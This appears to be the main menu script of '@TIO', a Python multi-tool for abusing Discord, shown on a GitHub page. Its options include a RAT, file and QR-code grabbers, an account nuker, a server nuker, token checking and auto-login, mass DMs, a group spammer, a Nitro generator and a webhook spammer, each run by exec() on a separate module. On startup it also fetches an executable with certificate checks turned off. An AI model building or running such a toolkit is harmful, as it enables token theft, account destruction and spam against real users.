-
Notifications
You must be signed in to change notification settings - Fork 267
/
atio.py
159 lines (154 loc) · 7.3 KB
/
atio.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
from util.plugins.update import search_for_updates
from util.plugins.commun import *
def main():
clear()
setTitle(f"@TIO Menu v{THIS_VERSION}")
astraahometitle()
print(f""" {y}[{b}+{y}]{w} Main Options: {y}[{b}+{y}]{w} Grabber Options: {y}[{b}+{y}]{w} Token Options: {y}[{b}+{y}]{w} Useful Options:
\n {y}[{w}01{y}]{w} Self Bot {y}[{w}06{y}]{w} File {y}[{w}09{y}]{w} Account Nuker {y}[{w}15{y}]{w} Tokens Checker
\n {y}[{w}02{y}]{w} RAT Tool {y}[{w}07{y}]{w} Image {y}[{w}10{y}]{w} Account Disabler {y}[{w}16{y}]{w} Clear DM
\n {y}[{w}03{y}]{w} Raid Tool {y}[{w}08{y}]{w} QrCode {y}[{w}11{y}]{w} Account Generator {y}[{w}17{y}]{w} House Changer
\n {y}[{w}04{y}]{w} Server Nuker {y}[{w}12{y}]{w} Settings Cycler {y}[{w}18{y}]{w} Server Lookup
\n {y}[{w}05{y}]{w} VideoCrash Maker {y}[{w}13{y}]{w} Token Informations {y}[{w}19{y}]{w} Mass DM
\n {y}[{w}14{y}]{w} AutoLogin {y}[{w}20{y}]{w} Group Spammer
\t\t\t\t\t\t\t\t\t\t\t\t\t {y}[{b}>{y}]{w} Next Page""")
global choice
choice = input(f"""{y}[{b}#{y}]{w} Choice: """).lstrip("0")
if choice == '1':
transition()
selfbottitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '2':
transition()
rattitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '3':
transition()
raidtitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool is under development, so it is not yet usable.")
main()
elif choice == '4':
transition()
raidtitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool is under development, so it is not yet usable.")
main()
elif choice == '5':
transition()
subprocess.call([r'util\\5_VidCrashMaker\\crashvideomaker.bat'])
elif choice == '6':
transition()
exec(open('util/6_FileGrab/filegrabber.py').read())
elif choice == '7':
transition()
imagegrabbertitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool is under development, so it is not yet usable.")
main()
elif choice == '8':
transition()
fakeqrtitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '9':
transition()
exec(open('util/9_AccountNuker/accountnuker.py').read())
elif choice == '10':
transition()
accountdisablertitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '11':
transition()
accountgentitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool is under development, so it is not yet usable.")
main()
elif choice == '12':
transition()
exec(open('util/12_SettingsCycler/settingscycler.py').read())
elif choice == '13':
transition()
exec(open('util/13_TokenInfo/tokeninfo.py').read())
elif choice == '14':
transition()
exec(open('util/14_AutoLogin/autologin.py').read())
elif choice == '15':
transition()
exec(open('util/15_TokensChecker/tokenschecker.py').read())
elif choice == '16':
transition()
cleardmtitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '17':
transition()
exec(open('util/17_HouseChanger/housechanger.py').read())
elif choice == '18':
transition()
exec(open('util/18_ServerLookup/serverlookup.py').read())
elif choice == '19':
transition()
exec(open('util/19_MassDM/massdm.py').read())
elif choice == '20':
transition()
groupspamtitle()
input(f"{y}[{Fore.LIGHTRED_EX }!{y}]{w} This tool don't work anymore.")
main()
elif choice == '>':
clear()
astraahometitle()
print(f""" {y}[{b}+{y}]{w} Nitro Options: {y}[{b}+{y}]{w} WebHooks Options: {y}[{b}+{y}]{w} Other Options:
\n {y}[{w}21{y}]{w} Generator {y}[{w}22{y}]{w} Spammer {y}[{w}24{y}]{w} Credits
\n {y}[{w}23{y}]{w} Remover {y}[{w}25{y}]{w} Exit\n\n\n\n\n\n\n\n\n\n {y}[{b}<{y}]{w} Previous Page""")
choice = input(f"""{y}[{b}#{y}]{w} Choice: """)
if choice == '21':
transition()
exec(open('util/21_NitroGen/nitrogen.py').read())
elif choice == '22':
transition()
exec(open('util/22_WebHSpam/webhspam.py').read())
elif choice == '23':
transition()
exec(open('util/23_WebHRemover/webhremover.py').read())
elif choice == '24':
transition()
astraahometitle()
print(f""" {y}[{b}+{y}]{w} Development Networks:\n\n {y}[{w}#{y}]{w} GitHub: @AstraaDev\n {y}[{w}#{y}]{w} Server: None\n\n\n {y}[{b}+{y}]{w} Other Network\n\n {y}[{w}#{y}]{w} Twitter: @AstraaDev\n {y}[{w}#{y}]{w} Discord: None\n\n\n\n\n""")
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
elif choice == '25':
transition()
sys.exit()
elif choice == '<':
clear()
main()
else:
clear()
main()
else:
clear()
main()
if __name__ == "__main__":
import sys
setTitle("@TIO Loading...")
System.Size(120, 30)
Anime.Fade(Center.Center(banner), Colors.purple_to_blue, Colorate.Vertical, time=1)
if not os.path.exists("output"):
os.makedirs("output", exist_ok=True)
if os.path.exists("output/QR-Code"):
shutil.rmtree(f"output/QR-Code")
os.system("""if not exist "util/chromedriver.exe" echo [#] Downloading chromedriver: """)
os.system("""if not exist "util/chromedriver.exe" curl -#fkLo "util/chromedriver.exe" "https://github.com/AstraaDev/complement/raw/main/chromedriver.exe" """)
if os.path.basename(sys.argv[0]).endswith("exe"):
search_for_updates()
clear()
main()
try:
assert sys.version_info >= (3,9)
except AssertionError:
input(f"{y}[{Fore.RED}#{y}]{w} Sorry but, your python version ({sys.version_info[0]}.{sys.version_info[1]}.{sys.version_info[2]}) is not compatible with @TIO, please download python 3.9 or higher.")
sys.exit()
else:
#search_for_updates()
clear()
main()